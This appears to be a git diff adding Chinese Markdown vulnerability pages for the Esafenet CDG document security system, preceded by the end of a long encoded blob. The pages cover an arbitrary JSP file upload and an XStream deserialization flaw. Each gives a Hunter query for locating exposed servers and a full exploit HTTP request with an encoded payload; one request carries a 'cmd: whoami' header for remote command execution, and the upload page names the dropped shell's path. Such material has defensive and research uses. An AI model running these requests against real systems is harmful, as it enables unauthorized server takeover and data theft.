IJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605516246-95de2d9f-57ab-4aa2-b617-e939126fba12.png](./img/WvmVMAPZqfXIaEL3/1706605516246-95de2d9f-57ab-4aa2-b617-e939126fba12-934316.png)
+
+
+
+> 更新: 2024-04-20 22:01:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wf0vz0u73yglcsc8>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞.md b/亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞.md
new file mode 100644
index 0000000..ec5da60
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞.md
@@ -0,0 +1,45 @@
+# 亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient任意文件上传漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/ZyqQDZT3JG_934By/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-467164.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
+Host: xxx.xxx.xxx.xxx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Connection: close
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=22C9717F219D60381079FEBCDC6F635A
+Content-Length: 9
+
+014435897
+```
+
+![1694274433318-8bf201e7-b8c9-4cc7-be8f-d29984fa0503.png](./img/ZyqQDZT3JG_934By/1694274433318-8bf201e7-b8c9-4cc7-be8f-d29984fa0503-721543.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/tttT.jsp
+```
+
+![1694274467839-bff7fb92-08d6-492d-92e5-ba54022d7c57.png](./img/ZyqQDZT3JG_934By/1694274467839-bff7fb92-08d6-492d-92e5-ba54022d7c57-498447.png)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gny15irlsb3oielm>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..802954b
--- /dev/null
+++ b/亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统UploadFileListServiceForClient存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/KGL3mR9YEaSpWhzU/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-080780.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/document/UploadFileListServiceForClient HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGN